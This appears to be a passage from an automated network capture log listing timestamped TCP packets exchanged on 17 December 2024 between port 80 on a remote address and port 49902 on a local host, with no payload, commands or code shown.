Dec 17, 2024 06:03:39.490178108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.490269899 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.492245913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.492309093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.492372036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.492440939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.494565010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.494611979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.494668961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.494709969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.496892929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.496934891 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.496990919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.497026920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.499202967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.499243021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.499329090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.499365091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.501470089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.501512051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.501691103 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.501729012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.503850937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.503890038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.504065990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.504102945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.506158113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.506196976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.506248951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.506284952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.508404016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.508491039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.508544922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.508584976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.510823011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.510878086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.510889053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.510925055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.513093948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.513130903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.513138056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.513165951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.515230894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.515275002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.515384912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.515425920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.517688990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.517723083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.517731905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.517760038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.519880056 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.519965887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.520232916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.520273924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.522259951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.522300959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.522310972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.522339106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.524548054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.524599075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.524616957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.526885986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.526913881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.526921988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.526949883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.526971102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.529211998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.529246092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.529277086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.529295921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.531558037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.531599998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.531620979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.531637907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.533927917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.533965111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.533977985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.534003019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.535938978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.535976887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.536108017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.536143064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.614722013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.614844084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.614909887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.614952087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.615567923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.615612984 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.615784883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.615829945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.617479086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.617542028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.617558002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.617604017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.619266987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.619364977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.619384050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.619431019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.621165991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.621238947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.621321917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.621372938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.623018980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.623080969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.623133898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.623182058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.624919891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.624932051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.624989986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.626651049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.626703024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.626703024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.626723051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.626765966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.628371954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.628443003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.628484964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.628530979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.630155087 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.630219936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.630235910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.630280972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.631906033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.631974936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.631999969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.632047892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.633534908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.633596897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.633646965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.633692026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647458076 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647505045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647516012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647587061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647587061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647634029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647644997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647655010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647665977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647680998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647705078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647888899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647900105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647910118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647919893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647929907 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647939920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647949934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647959948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.647962093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647962093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.647972107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.648006916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.648030043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.648595095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.648650885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.649002075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.649049997 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.650217056 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.650271893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.650291920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.650331020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.651844978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.651913881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.652163982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.652224064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.653383970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.653438091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.653567076 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.653605938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.654903889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.654963970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.655014992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.655059099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.656481981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.656526089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.656543016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.656584978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.658016920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.658092976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.658094883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.658138037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.659502029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.659560919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.659574986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.659617901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.660938978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.660993099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.661072016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.661118031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.662415028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.662478924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.662575960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.662622929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.663940907 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.663995981 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.664072990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.664124012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.665429115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.665492058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.665602922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.665647984 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.666915894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.666980028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.666996002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.667041063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.668489933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.668559074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.668620110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.668662071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.669902086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.669965029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.669979095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.670022964 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.671344995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.671411037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.671433926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.671478987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.672787905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.672846079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.672924042 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.672970057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.674308062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.674375057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.674381971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.674426079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.675761938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.675826073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.675875902 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.675924063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.677253962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.677313089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.677403927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.677457094 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.678749084 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.678807020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.678860903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.678917885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.680248022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.680303097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.680351973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.680402040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.681803942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.681818008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.681858063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.681946993 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.683180094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.683233976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.683305979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.683357954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.684772968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.684786081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.684839964 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.686254978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.686268091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.686322927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.687717915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.687750101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.687782049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.687808037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.689133883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.689213037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.689232111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.689273119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.690660954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.690712929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.690764904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.690808058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.692159891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.692217112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.692346096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.692385912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.693597078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.693660975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.693746090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.693794966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.695100069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.695162058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.695282936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.695327997 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.696619034 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.696654081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.696672916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.696691036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.697997093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.698054075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.806689024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.806761980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.806809902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.806842089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.806940079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.806968927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.806984901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.807007074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.810458899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.810487986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.810518026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.810544014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.810544968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.810544968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.810573101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.810574055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.810580969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.810616016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.810630083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.810672998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.811805964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.811851978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.811889887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.811930895 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.812980890 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.813040972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.813121080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.813169956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.814021111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.814058065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.814129114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.815099955 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.815148115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.815345049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.815385103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.816092968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.816138983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.816265106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.816308975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.817104101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.817147970 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.817276001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.817322016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.818394899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.818429947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.818448067 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.818474054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.819426060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.819489002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.819565058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.819613934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.820492983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.820528030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.820545912 CET	49902	80	192.168.2.5	31.41.244.11
